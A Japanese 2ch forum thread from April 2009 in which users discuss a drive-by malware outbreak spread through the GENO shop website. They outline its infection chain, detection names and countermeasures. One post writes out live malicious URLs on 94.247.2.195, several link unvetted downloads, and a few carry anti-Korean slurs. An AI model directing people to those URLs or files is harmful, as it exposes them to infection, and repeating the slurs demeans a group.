GENOなどのサイトでウイルス感染★6

このエントリーをはてなブックマークに追加
1 サクラソウ(dion軍)

中古PCとPCパーツの通販ショップGENO URL略

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?

前スレ
GENOなどのサイトでウイルス感染★5
http://tsushima.2ch.net/test/read.cgi/news/1239009596/

4/4 AM10時ごろ〜?からサイトにアクセスするだけで感染。
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。

今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
クリーンインストール推奨

・最新版のWindowsUpdateとadobeAcrobatとAdobe Flashであれば感染しない?
・ファイル作成を検出できたアンチウイルスソフトは40のうち10だけ。
・結論、管理もしてないようなPCでアクセスすれば余裕で感染する。

あちこちに短縮URLが貼られているようなので注意
発覚してないだけで他にも感染しているサイトがあるかも
2 アグロステンマ(関西地方):2009/04/06(月) 23:05:52.20 ID:hSh05tv7
3 ねこやなぎ(栃木県):2009/04/06(月) 23:06:35.83 ID:ASIy5qNI
速い
4 サクラソウ(dion軍):2009/04/06(月) 23:06:52.87 ID:4tJoYW5y
(1)感染したWebページをひらく

(2)感染したjsが、94.247.2.195の改変jquery.jsを実行

(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)

(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開

(5)bufferOverrunでウィルス本体の起動を試行

感染した場合
パスワードなどの個人情報が抜かれている可能性あり

いつものバックドア系ウイルスなんだけど、今回なんか変だな
・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン

とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな

対策

WindowsUpdate
PDFリーダーを最新にする (AdobeReader や Foxit Reader)
AdobeFlashを最新にする
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
Javascriptを切る
スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)
5 ケマンソウ(福島県):2009/04/06(月) 23:07:11.11 ID:HjviSCsZ
まだやってんの?
6 水芭蕉(関西地方):2009/04/06(月) 23:07:36.45 ID:HeyTsuvq
まだ続けるのかよw
7 シロバナタンポポ(愛知県):2009/04/06(月) 23:08:00.81 ID:fcESYb+F
1000 名前: カロライナジャスミン(山陰地方)[sage] 投稿日:2009/04/06(月) 23:06:05.16 ID:fWImSR6Y
1000ならゲノ死亡

よくやった
8 カロライナジャスミン(山陰地方):2009/04/06(月) 23:09:04.72 ID:fWImSR6Y
実は俺の初1000ゲトだったりするわけで……これまで取れなかったのに何でこんなとこで
9 キブシ(静岡県):2009/04/06(月) 23:09:11.34 ID:WLvvfchb
ニュー速から戦死者が出たことは忘れない
10 イワカガミダマシ(西日本):2009/04/06(月) 23:09:20.72 ID:C0QgVMw5
やめません
直るまで
11 タツナミソウ(神奈川県):2009/04/06(月) 23:09:27.28 ID:kYpBlSOw
まだやってるのか
VISTAで踏みまくったが問題なかったからいいや
イメージもバックアップもとってあるから
12 ハナズオウ(関東・甲信越):2009/04/06(月) 23:09:47.20 ID:nP6Nbc3E
これfoxitでもまずいの?
13 オオジシバリ(東京都):2009/04/06(月) 23:09:57.73 ID:0CJc5+lA
スレ3のアドレスください
14 オウレン(北海道):2009/04/06(月) 23:10:09.39 ID:KJ8TDzs4
おい、おまいらのせいでwindos update重いんだけど。
15 サクラソウ(dion軍):2009/04/06(月) 23:11:02.02 ID:4tJoYW5y
>>13
【注文0.1】Genoのサイトでウイルス感染…か?★3
http://tsushima.2ch.net/test/read.cgi/news/1238944195/
16 タツナミソウ(神奈川県):2009/04/06(月) 23:11:05.14 ID:kYpBlSOw
>>14
それどこか違うとこにもつながっている
17 ヤブツバキ(秋田県):2009/04/06(月) 23:12:04.88 ID:3HrAKnlt
前スレ>>987
コマンドプロンプト起動した覚えは?
conime.exeはコマンドプロンプトで日本語を表示する為の物なんだけど
18 カタクリ(長崎県):2009/04/06(月) 23:12:33.66 ID:2J+HSe42
今こそ国際電話(Q2)を復活させようぜ!
19 アメリカヤマボウシ(アラバマ州):2009/04/06(月) 23:13:18.01 ID:5hUOEPvM
AVAST! 090406-0
antivir 7.01.03.19
これ対応してないよね?
なんかPC遅いんだよな、払いきれてない感じがする

20 ボケ(アラバマ州):2009/04/06(月) 23:13:59.29 ID:og3Iq5mb
トロイに壁紙をエロ画像に変えられたのはいい思い出
21 ベニバナヤマボウシ(静岡県):2009/04/06(月) 23:14:13.87 ID:uSJH9xGQ
>>8
ワロタ
22 シロイヌナズナ(埼玉県):2009/04/06(月) 23:14:30.99 ID:trk32fzF
NoScript重いからYesScriptで代用してたのに
さすがに今回はNoを入れて凌ぐわ

NoScriptみたいに高機能じゃなくていいから
単純にホワイトリスト形式でスクリプト制限してくれるアドオン無いかな?
23 シラー・カンパヌラータ(福島県):2009/04/06(月) 23:15:39.87 ID:jBX++tmb
今家電で売ってるパソって全部vistaじゃんか
知識無いからメーカー品買うのに肝心のネット初心者が
vista使ってるんじゃ感染しないんジャマイカよ
24 ヒメスミレ(アラバマ州):2009/04/06(月) 23:15:59.56 ID:+dIvgMWm
こういう鯖管の行動
coderedやnimdaの時に沢山見たな
馬鹿すぎて最後は誰かのせいにして思考停止
25 ヤブテマリ(兵庫県):2009/04/06(月) 23:16:02.92 ID:r/jIlmP2
PC初心者でもわかるように説明してほしい
どんなウイルス?
26 コスミレ(愛知県):2009/04/06(月) 23:16:19.93 ID:uy8mRWXW
いちもつ
27 ペラルゴニウム(宮崎県):2009/04/06(月) 23:16:55.39 ID:1bsNL63e
何でGENO【などの】なの?
28 シロウマアサツキ(アラバマ州):2009/04/06(月) 23:17:04.49 ID:mGlifku8
各アンチウィルスの対応状況とか纏めてくれよ
29 ツゲ(東京都):2009/04/06(月) 23:18:26.22 ID:qIJKmnXw
踏んだからスキャンしたらノートン何も検知しなかったんだけど大丈夫かな
30 ビオラ(長野県):2009/04/06(月) 23:18:27.47 ID:fBMVjkoS
再起動しても大丈夫だったけどスタートアップのアプリが起動しなくなった
31 オオジシバリ(東京都):2009/04/06(月) 23:19:20.02 ID:0CJc5+lA
>>15
ありがとん
32 クロッカス(コネチカット州):2009/04/06(月) 23:19:31.57 ID:6lHIYrud
OSの再インストールおっ始めたがアプリのインストール考えると鬱になる
恨むぞGENO
33 サクラソウ(dion軍):2009/04/06(月) 23:19:54.71 ID:4tJoYW5y
検出できるソフト一覧
●a-squared     4.0.0.101
 2009.04.03 Trojan-Spy.Agent!IK
●Avast       4.8.1335.0
 2009.04.03 Win32:Daonol-L
●eSafe       7.0.17.0
 2009.04.02 Suspicious File
●GData       19
 2009.04.03 Win32:KillAV-KS
●Ikarus    T3.1.1.49.0
 2009.04.03 Trojan-Spy.Agent
●Kaspersky     7.0.0.125
 2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
 2009.04.03 Generic!Artemis
●Prevx1      V2
 2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
 2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
 2009.04.03 PAK_Generic.001
34 サクラソウ(中部地方):2009/04/06(月) 23:20:12.43 ID:0iOggIYb
てかGENO側は何も対応してないの?
酷すぎだろ
35 シロウマアサツキ(アラバマ州):2009/04/06(月) 23:21:22.72 ID:mGlifku8
>>33
ありがとうありがとう
36 プリムラ・フロンドーサ(埼玉県):2009/04/06(月) 23:21:27.76 ID:+fA3NqCc
>>23
自称・情報強者が引っかかるので問題ありません
37 ゲンカイツツジ(アラバマ州):2009/04/06(月) 23:21:51.62 ID:uX9sUlIf
>>33
Update AVG - AVI 270.11.43/ 2043
Added detection of new variant of Worm/Generic.XYQ, Worm/Generic.XYY, new variants of trojans Agent2.CWY, Downloader.Generic8.AFHP, Generic13.ULR, BackDoor.Generic11.GUZ.

April 6, 2009
38 ショウジョウバカマ(関東・甲信越):2009/04/06(月) 23:22:02.13 ID:B9tKkqBv
規制依頼にリンクまとめ貼ってあったがあれ結構やばいだろ
39 プリムラ・マラコイデス(宮崎県):2009/04/06(月) 23:22:22.73 ID:MdZ2B4+V
会社のPCでアクセスしちまったよ・・・
明日には管理者にバレルんだろうなあ
40 ショウジョウバカマ(神奈川県):2009/04/06(月) 23:22:32.12 ID:stdxwdNc
>>33のはもう古いかも
誰かがvirustotalだかにもう一度うpすれば検出できるソフト更新されてるかも
41 コブシ(大分県):2009/04/06(月) 23:23:25.62 ID:sLPMAwDQ
42 クンシラン(コネチカット州):2009/04/06(月) 23:23:32.36 ID:CYlbbFY+
>>17
当人ではないがコマンドプロントを起動してないが
conime.exeが動いてる

urlはおそらく踏んでないが、自信ない  当方vista
43 シラー・カンパヌラータ(アラバマ州):2009/04/06(月) 23:23:40.87 ID:b2z/hc44
トロジャン(笑)
44 オウレン(北海道):2009/04/06(月) 23:24:40.05 ID:KJ8TDzs4
>>16
それどういうこと?
45 ヒナゲシ(神奈川県):2009/04/06(月) 23:25:53.74 ID:Y+mH0p1K
>>43
すし食いてぇ
46 クワガタソウ(福島県):2009/04/06(月) 23:26:08.43 ID:2KszbPeI
aviraも今は検出できるはずだな
47 サポナリア(神奈川県):2009/04/06(月) 23:26:17.56 ID:XPl8awN1
会社のPCでアクセスとか救いようのねぇ馬鹿だな
48 オオジシバリ(東京都):2009/04/06(月) 23:26:52.37 ID:0CJc5+lA
>>42
同じ状態 当方Vista64
49 オオタチツボスミレ(東京都):2009/04/06(月) 23:27:05.64 ID:rrMoZaqr
>>45

      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン     へいおまち!
     i,   ` ,、/ i_ `` ,r'
   ,r〃'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__         ∬∫
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_    | ̄ ̄ ̄|
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `    |二茶二|
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i     ヾニニニ.ノ
50 カンガルーポー(東日本):2009/04/06(月) 23:27:24.71 ID:OzAR3E82
>>27
一応これと他に楽天の店舗でやられたらしき所がある。
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690
51 ナニワズ(神奈川県):2009/04/06(月) 23:27:40.04 ID:CXFwf+Kp
再インスコめんどくせぇぇぇ
52 クモマグサ(アラバマ州):2009/04/06(月) 23:27:47.70 ID:NZfxPrL5
つうか情弱じゃなければ通常、HijackThisあたりで確認すんだろ
processesや、 Protocol、stylesheet、Serviceなんて見たことねえのか
53 アメリカヤマボウシ(dion軍):2009/04/06(月) 23:28:09.40 ID:2kvPQek7
>94.247.2.195(94.247.[2-3].[0-255])への接続を遮断

これやりかたキボンヌ
54 コハコベ(千葉県):2009/04/06(月) 23:30:09.99 ID:RAsn9HbR
>>50
あ、そっちのスレでいろいろと他のサイトでの同種ウィルス被害が寄せられてたのか。
ここのスレしかチェックしてなかったから全然知らなかったわ。
55 オニタビラコ(コネチカット州):2009/04/06(月) 23:30:48.49 ID:A75DTAH4
今日の疑心暗鬼スレ
めしうまwwww



まあ俺も踏んでるわけだが。
56 雪割草(福岡県):2009/04/06(月) 23:31:27.29 ID:5pPjoQqo
>>53
Adblock Plusで遮断するのなら
*/94.247.[2-3].[0-255]/*
を要素に追加。
57 アルメリア(東日本):2009/04/06(月) 23:31:31.51 ID:+vRljxxx
GENOから商品発送のお手紙が届いてた
ちゃんと機能してて安心した
58 コハコベ(関西地方):2009/04/06(月) 23:31:50.50 ID:3DBLEB/B
GENOの事は知ってたのに
検索して一番上にあったのを何も考えずに踏んでしまった
conime.exeが動いてたらアウトなの?
59 クレマチス・モンタナ(九州):2009/04/06(月) 23:31:53.05 ID:Ugt3gVVi
ウイルスキラーはよせいやああああああああああああああああ
60 セイヨウタンポポ(アラバマ州):2009/04/06(月) 23:32:54.87 ID:h7WaMfhP
普通にページ復活してて謝罪が一切見あたらないんだけどどういうこと?
61 サクラソウ(アラバマ州):2009/04/06(月) 23:33:18.22 ID:7GvBPr1Z
>>40
aviraに送ったpdfファイルの検体上げてみたら2個しか対応してないみたいだぜ。
F-Secure: Exploit.Win32.Pidief.aog
Kaspersky: Exploit.Win32.Pidief.aog
62 ミツマタ(dion軍):2009/04/06(月) 23:33:32.31 ID:w8+NbaTJ
>>33
NOD32はダメか・・・
NODの時代も終わりかな
63 桜(中部地方):2009/04/06(月) 23:33:46.03 ID:r/fRH6Tn
なんか削除議論でケンカしてるぞw

http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
64 アルメリア(東日本):2009/04/06(月) 23:34:21.39 ID:+vRljxxx
あれれ?またメンテナンス中になっちゃってるw
>>60 50文字ぐらいでなんか右あたりに小さく書いてあったよ
65 シラー・カンパヌラータ(福島県):2009/04/06(月) 23:34:21.99 ID:jBX++tmb
よく分からないんだがgenoのサイトにさえ行かなきゃ良いんのかな?
66 キュウリグサ(福岡県):2009/04/06(月) 23:35:41.60 ID:3ht4RxTE
>>61
それでいいのか、おれもやってみる
67 レンギョウ(福島県):2009/04/06(月) 23:36:51.40 ID:DMn3i2ip
現在の更新の情報
合計時間: 1:06

- Vps: 更新されました
(前のバージョン: 090405-1, 更新後のバージョン: 090406-0)

サーバー: download975.avast.com (74.54.138.226)
ダウンロード ファイル: 5 (27.92 KB)
ダウンロード時間: 3 s
68 コハコベ(千葉県):2009/04/06(月) 23:38:04.02 ID:RAsn9HbR
>>65
芸能事務所の研音がやってるネット通販サイトや
楽天の特定のショップなんかでも
同じウィルスに反応したって書き込みがセキュリティ板のスレにあった位なんで、
geno以外のサイトでも危ない可能性も十分にある。
69 ヤブツバキ(秋田県):2009/04/06(月) 23:38:58.11 ID:3HrAKnlt
>>42
>>48
名前はいくらでも偽装出来るからなぁ
プログラムの置いてある場所を確認すればいいかも
70 キバナスミレ(関東・甲信越):2009/04/06(月) 23:41:54.20 ID:jah6RO8L
よく考えたらエロ動画とアニラジしか持ってないから、どうでもいいや
71 ミツマタ(dion軍):2009/04/06(月) 23:42:11.98 ID:w8+NbaTJ
Antivirus Software NOD32
Update info
Update 3989 (20090406) 2009-04-06 12:03

INF/Autorun, Win32/Adware.InternetAntivirus (5), Win32/Adware.MSAntispyware2009 (2),
Win32/Adware.SystemSecurity, Win32/Adware.Virtumonde (2), Win32/Agent.PEH (3),
Win32/Agent.PEI, Win32/Agent.PEJ, Win32/Agent.PEK (2), Win32/AutoRun.FlyStudio.FO (2),
Win32/BHO.NNU (2), Win32/Cimag.AA, Win32/Delf.OEY (3), Win32/DNSChanger,
Win32/FlyStudio.NIX, Win32/FlyStudio.NIY (2), Win32/Hupigon.NNE, Win32/Olmarik.FT (6),
Win32/Prosti.NBZ (2), Win32/PSW.LdPinch.NKR, Win32/PSW.Lineage.NHH,
Win32/PSW.OnLineGames.NMP (3), Win32/PSW.OnLineGames.NMY (3),
Win32/PSW.OnLineGames.NNU (4), Win32/PSW.OnLineGames.ODJ,
Win32/PSW.OnLineGames.XTT (2), Win32/Rootkit.Agent.NKR (5),
Win32/Spy.Zbot.NW, Win32/TrojanClicker.Delf.NDJ, Win32/TrojanClicker.Delf.NDK,
Win32/TrojanClicker.Delf.NDR (3), Win32/TrojanClicker.Delf.NGQ (2),
Win32/TrojanClicker.Delf.NGR (6), Win32/TrojanDownloader.Agent.OXU (2),
Win32/TrojanDownloader.Agent.OYF (3), Win32/TrojanDownloader.Agent.OYW,
Win32/TrojanDownloader.Delf.OSA (2), Win32/TrojanDownloader.Delf.OSB,
Win32/TrojanDownloader.FakeAlert.ABE, Win32/TrojanDownloader.FakeAlert.ABF (3),
Win32/TrojanDownloader.Small.ONY (2), Win32/TrojanDownloader.Zlob.CZG,
Win32/TrojanDownloader.Zlob.CZK, Win32/TrojanDropper.Agent.NXQ,
Win32/TrojanProxy.Small.NDR (2), Win32/VB.ND, Win32/Wigon.KA


対応してるのか対応してないのか多すぎてよく分かんないや
72 シラー・カンパヌラータ(福島県):2009/04/06(月) 23:42:46.60 ID:jBX++tmb
conime.exeはデフォルトで起動してるから大丈夫だよ




たぶん
73 アヤメ(愛知県):2009/04/06(月) 23:42:53.76 ID:vtQoWNO2
ふひー 
この頃中古パソコン通販サイトを巡回してたから心配だったけど感染してなかったぜ
感染したらでる症状は無いし 糞マカフィーでウイルススキャンもした
74 クワガタソウ(福島県):2009/04/06(月) 23:43:10.65 ID:2KszbPeI
75 エピデントルム(dion軍):2009/04/06(月) 23:43:20.24 ID:sGIhfXAV
さくっと検査ツール書いてみた。
実行ファイルだけだと怪しいのでソースコードも入れといたので。

http://www.vipper.org/vip1173341.zip.html
76 アヤメ(愛知県):2009/04/06(月) 23:44:20.88 ID:vtQoWNO2
もし感染してHDDが壊れたりしたらたまらん
HDDにリカバリ機能が埋め込まれているタイプだ どのURLもふめん
77 ヒサカキ(埼玉県):2009/04/06(月) 23:44:25.41 ID:aPjSkIRj
Adobeのメーラーみたいのが立ち上がってたんだが
もう手遅れ?
78 カントウタンポポ(大阪府):2009/04/06(月) 23:44:37.26 ID:y9Oam7Un
NoScript最強伝説
79 サクラソウ(catv?):2009/04/06(月) 23:45:18.43 ID:q3CTINSl
うんこ
80 クワガタソウ(福島県):2009/04/06(月) 23:45:40.42 ID:2KszbPeI
>>75
おつ
81 ビオラ(神奈川県):2009/04/06(月) 23:45:59.91 ID:X4gFusG9
踏むと具体的にどんな被害が出るの?
82 サクラソウ(東京都):2009/04/06(月) 23:47:01.19 ID:TBIi1rYV
当方vista、該当URL未踏、conime.exe動いてるけど問題無し

たぶん
83 ケンタウレア・モンタナ(東海):2009/04/06(月) 23:47:27.96 ID:yclA/QEE
ウイルスとか感染経験ないからよくわかんないんだけど
HDDってウイルスで物理的に壊されるってあるの?
84 クンシラン(コネチカット州):2009/04/06(月) 23:48:04.50 ID:CYlbbFY+
>>69
system32にあるみたい
問題なさそうですね
85 雪割草(福岡県):2009/04/06(月) 23:48:06.26 ID:5pPjoQqo
hostsファイルいじりたい人におすすめ
Hosts Manager
http://blocklistpro.com/download-center/biss-hosts-manager/
86 オオジシバリ(東京都):2009/04/06(月) 23:49:32.74 ID:0CJc5+lA
そうか、Vistaでconime.exeは平気なのか
元々未踏だけど良かった良かった

たぶん
87 ヘラオオバコ(長崎県):2009/04/06(月) 23:50:18.46 ID:+TSOM/Ou
>>46
そうなのか
試しにスキャンしてみるか
88 コハコベ(千葉県):2009/04/06(月) 23:50:29.06 ID:RAsn9HbR
>>83
もともと壊れかけてたHDDに
ウィルスによってガリガリ書き込まれて壊れるなんていう可能性もゼロではない。

89 ヘラオオバコ(長崎県):2009/04/06(月) 23:51:01.06 ID:+TSOM/Ou
>>75
まだ確かめてないけど乙
90 トウゴクミツバツツジ(北海道):2009/04/06(月) 23:51:24.72 ID:Uu6CtAD6
91 キランソウ(神奈川県):2009/04/06(月) 23:52:23.18 ID:BgCbEVwt
>株式会社GENO(ジェノ)は常にお客様の立場で考え
92 コメツブツメクサ(東京都):2009/04/06(月) 23:52:58.99 ID:DQBUBXgm
ここでジェネオンがウイルス感染すればいいのに
93 アヤメ(愛知県):2009/04/06(月) 23:53:47.64 ID:vtQoWNO2
>>90
怖くて踏めん 誰か踏んでくれ
94 ナツグミ(大阪府):2009/04/06(月) 23:54:06.30 ID:eUe6udYF
他のパーツ&ジャンクショップは
genoの人気に嫉妬してるなw
95 アメリカヤマボウシ(アラバマ州):2009/04/06(月) 23:54:22.53 ID:5hUOEPvM
antivir 7.01.03.20
これか、またスキャンしてくるか
96 ユキヤナギ(埼玉県):2009/04/06(月) 23:54:48.90 ID:4Nvt9Ddt
南朝鮮人の犯行なのか
97 マツバウンラン(青森県):2009/04/06(月) 23:55:00.41 ID:orAYOQpL
お詫びはあったの?
98 シラー・カンパヌラータ(福島県):2009/04/06(月) 23:55:18.80 ID:jBX++tmb
よく考えてみたらスレ内でも末尾にjpgが付いてないURLなんか
踏まないようにしてるから現時点では感染はしてないだろうな・・
99 アヤメ(西日本):2009/04/06(月) 23:55:48.65 ID:0hc/751Y
>>93
羹に懲りて膾を吹くだな
100 ムラサキナズナ(dion軍):2009/04/06(月) 23:56:09.71 ID:XFr/bKuW
>>93
ニコニコ
101 サクラソウ(dion軍):2009/04/06(月) 23:56:18.13 ID:Seo3dQYv
サーバーメンテ中に踏んで、1回電源も落としたけど
特にそれっぽい症状今のところないな。
試しにIEも使ってみたけど、エラーふいたりしないし。
102 ねこやなぎ(栃木県):2009/04/06(月) 23:56:21.03 ID:ASIy5qNI
再起動して帰ってこれたって事は感染してないって事だな
103 アヤメ(西日本):2009/04/06(月) 23:56:57.88 ID:0hc/751Y
>>98
末尾は全く関係ない
jpgだろうがzipだろうが偽装し放題だ
104 サクラソウ(東京都):2009/04/06(月) 23:57:00.23 ID:pS5BjbUv
イヤガラセと仕返しのために、
genoウイルス で、いろんなサイトで
検索しまくろう。

グーグルの、
「急上昇キーワード」
にのせてしまおう 
105 アルストロメリア(アラバマ州):2009/04/06(月) 23:57:01.63 ID:uhkpegml
>>17
XPなんだがコマンドプロンプト開いた覚えはないなあ
PC起動するのが怖くなってきた。
CPUは何もしていない状態で5%ちょっと。
106 ムラサキナズナ(アラバマ州):2009/04/06(月) 23:57:44.36 ID:0ucSszJC
>>95
それで対応した
107 カロライナジャスミン(山陰地方):2009/04/06(月) 23:58:24.61 ID:fWImSR6Y
>>93
普通の動画ページだった。関係ないっぽいけどね

【維新政党・新風】弁士、韓国人に襲われる
カテゴリ 政治 での前日マイリスト順位:圏外 ( 過去最高:圏外 ) 【ランキング推移を確認】

youtubeから。この朝鮮人は「韓国人はゴミ」という発言にファビョったみたいです。本当にゴミと言ったのか火病の妄想なのかはさだかではありませんが、
2:12に「おどんりゃ韓国人なめとったら殺すぞ」と発言しています。
さて、日本の法律で罰せられるのはどちらなのでしょうか?追記:マイリス支援ありがとうございます。皆さんに大変感謝しております。
他の方の動画はどうやら消されてしまったみたいです…。
※そういえば、ブラック軽部さんがよく「ゴミはゴミ箱に!朝鮮人は朝鮮半島に!」と言ってますね^^似たような物です

って内容

108 キュウリグサ(福岡県):2009/04/06(月) 23:58:57.05 ID:3ht4RxTE
>>93
維新政党・新風、弁士の「韓国人はゴミ発言」に
在日韓国人がキレて「暴行」するニコニコ動画
109 アヤメ(愛知県):2009/04/06(月) 23:59:38.09 ID:vtQoWNO2
>>99
一度も踏んでないけど でもやっぱり怖い 一度も踏んでないから怖い
110 ヤブツバキ(秋田県):2009/04/06(月) 23:59:39.87 ID:3HrAKnlt
>>105
自分もプロセス数がいつもより多いと怖くなる事があるよ
system32にあるようなら心配いらないと思う。
111 サクラソウ(dion軍):2009/04/06(月) 23:59:54.89 ID:Seo3dQYv
>>102
今回のやつも再起動したら帰ってこれないタイプ?
そうとは知らず、寝て起きてから対応すっか。って電源切ったわあぶねえw
112 藤(静岡県):2009/04/07(火) 00:00:28.96 ID:uNvGQdp3
挿入っちゃった?
113 オニノゲシ(大阪府):2009/04/07(火) 00:01:15.11 ID:x0fvDBxf
Acrobat入れてなかった・・・
スキャンした時間無駄だった
114 アルストロメリア(愛知県):2009/04/07(火) 00:02:11.03 ID:vtQoWNO2
今の所なんの症状もでててててないし 感染したらの条件にもおあてはまらなないけでお 再起動するのが怖い
115 ストック(愛知県):2009/04/07(火) 00:02:22.84 ID:eA42zTp3
またもやavast先生大勝利!
116 ネメシア(栃木県):2009/04/07(火) 00:02:26.44 ID:ASIy5qNI
>感染した場合
>・再起動時にブルースクリーン

>とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな
117 カンガルーポー(大分県):2009/04/07(火) 00:03:10.87 ID:D62YtaE4
げのは何か対策したの?
118 サンシュ(神奈川県):2009/04/07(火) 00:03:19.29 ID:xYAGql03
KingSoftまだなんですか
119 プリムラ・マラコイデス(長屋):2009/04/07(火) 00:03:36.34 ID:siulDVY1
   /__.))ノヽ
   .|ミ.l GENO._i.)
  (^'ミ/.´・ .〈・ リ
  .しi   r、_) |  ウィルスはわしが育てた
    |  `ニニ' /
   ノ `ー―i´
120 ヤグルマギク(dion軍):2009/04/07(火) 00:03:40.77 ID:Fm5QmveS
してない
121 アメリカヤマボウシ(東京都):2009/04/07(火) 00:04:13.31 ID:MdgrCB3i
ジェノサイトウィルス感染病はもう治ったんかいな
122 サトザクラ(dion軍):2009/04/07(火) 00:04:15.95 ID:9PtYcuVS
ノートンで検出できる?
123 ヤエヤマブキ(福岡県):2009/04/07(火) 00:05:14.29 ID:pgsxCmAv BE:493376494-2BP(8000)

最近、何にも使ってないのにスタートメニューにメモ帳とペイントがあるんだけど何だろか?
124 アルメリア(アラバマ州):2009/04/07(火) 00:05:19.61 ID:zolLq5Cc
>>110
取り敢えずどのサイトも信用できないからこの騒動おさまるまでPCはiPod充電だけに使うことにするよ。

まぁ、何回も再起動しても普通に起動するから大丈夫だよな。IE落ちたりもしないし。
安心して寝れるわ。ありがとう
125 マーガレット(京都府):2009/04/07(火) 00:05:31.43 ID:vsJ8a3vR
ああ・・
Javascript切ってれば大丈夫なのか
火狐で良かったわ
zipと思って踏んだら罠だったってのが我ながら情けない限りだが
126 キランソウ(福岡県):2009/04/07(火) 00:06:11.61 ID:3ht4RxTE
セキュリティソフトはこういうときにサクっと対応するほうが
TVでCMするより宣伝効果ありそうなもんだが
いや、ないな、ないわ
127 アルストロメリア(愛知県):2009/04/07(火) 00:06:31.47 ID:vtQoWNO2
>>125
火狐なら感染しないの?
128 ニリンソウ(京都府):2009/04/07(火) 00:06:33.12 ID:WOlV9TlO
AVG今回の対応遅かったな
P2Pに出回るウィルスには強いから今後も使い続けるけど
129 シロバナタンポポ(アラバマ州):2009/04/07(火) 00:06:55.73 ID:mGlifku8
AVGはまだダメって本スレにかいてある・・・
怖いよ
130 ヒメマツムシソウ(dion軍):2009/04/07(火) 00:07:00.22 ID:La21hUVk
よくわからんけどこえー
しばらく画像スレにはいけないな
131 ハナモモ(宮崎県):2009/04/07(火) 00:08:54.70 ID:07SNJE2W BE:9966672-2BP(7)

AntiVir対応きた?
またスキャンするか
132 マムシグサ(神奈川県):2009/04/07(火) 00:09:52.80 ID:MtO90/es
毎日GENOと電脳バイオーを見るのが日課だけどウイルスになんて感染しなかったぞ??
Sleipnir2.xでIE8コンポ使用、avast!とPCtoolsを使ってる
133 オウレン(埼玉県):2009/04/07(火) 00:09:53.32 ID:J9fZ7s49
あれだけニュー速騒いだくせにTOPの隅っこで謝罪とか笑える
134 ローダンゼ(富山県):2009/04/07(火) 00:10:14.94 ID:FM3jLg6g
GENOのサイトが鯖メンテ中になってるな
昨日は実験用の仮想マシンで踏んだらAvastが反応したけど
135 キクザキイチゲ(福岡県):2009/04/07(火) 00:10:32.44 ID:8Doz9pYt
//94.247.2.195/news/?id=10&踏んだらZoneAlarmが反応
http://www3.uploda.org/uporg2146139.jpg

//94.247.2.195/news/?id=10踏んだら「"La.exe"をどうする?」と火狐。
136 アルストロメリア(愛知県):2009/04/07(火) 00:11:59.82 ID:PpAfGl6U
感染しないよにする対策とかってないの?
137 ボケ(愛知県):2009/04/07(火) 00:12:21.64 ID:3Qk1h4XE
>>127
Javascript切ってれば良い
だからスレイプニルでも対策できる
138 イカリソウ(長屋):2009/04/07(火) 00:12:25.79 ID:x0MudcTT
avastの検査
トレンドマイクロのオンラインスキャン完了

なんもでねぇな
つまんね
139 クロッカス(catv?):2009/04/07(火) 00:13:04.65 ID:F21+lZgA
毎日GENO見てる俺涙目
昨日再起動した時開いても無いのに、
"表示中のpdfが閉じられようとしていますと"
とかでて?だったんだけど感染したか・・・
140 ヒュウガミズキ(catv?):2009/04/07(火) 00:13:43.55 ID:pJv5Llq+
なんで情報強者のニュー速民がひっかかってるのかと思ったら、
zipスレで性欲に負けて何の疑いもなしにURLクリックしたZIP猿共なのか
141 ニオイタチツボスミレ(兵庫県):2009/04/07(火) 00:14:03.96 ID:2Etgg6kd
2ch内では結構大きな騒ぎなのに
ニュースサイトが軒並み報じないのはなんでどうして?
142 クロッカス(catv?):2009/04/07(火) 00:14:46.64 ID:F21+lZgA
メモリ使用量600MBって・・・
143 藤(静岡県):2009/04/07(火) 00:14:47.92 ID:7FEIlg8h
知名度が無いのが致命的
144 ヤエヤマブキ(京都府):2009/04/07(火) 00:15:01.08 ID:a3TeJlzo
>>141
管理人もひっかかってたりして
145 ヒマラヤユキノシタ(神奈川県):2009/04/07(火) 00:15:08.63 ID:QRCMHhxZ
>>136
ネットにつなぐな
146 シデコブシ(大阪府):2009/04/07(火) 00:15:28.85 ID:QK6eo+d5
147 アルストロメリア(愛知県):2009/04/07(火) 00:16:26.29 ID:PpAfGl6U
>>137
Javascriptって切ってて困ることってないか?
148 シデコブシ(大阪府):2009/04/07(火) 00:17:16.98 ID:QK6eo+d5
誤爆した。

誤爆ついでに>>146のリンク先のzip,Vb2009でウイルス反応でるんだけど誤検知?
149 シラネアオイ(福島県):2009/04/07(火) 00:17:23.44 ID:ZlGID39V
>>141
邪推でもなんでもないが騒げるだけのネタに育ったら
報道しだすだろうよ
150 モリシマアカシア(東京都):2009/04/07(火) 00:17:31.16 ID:fhtlRrYZ
lightboxが動かない
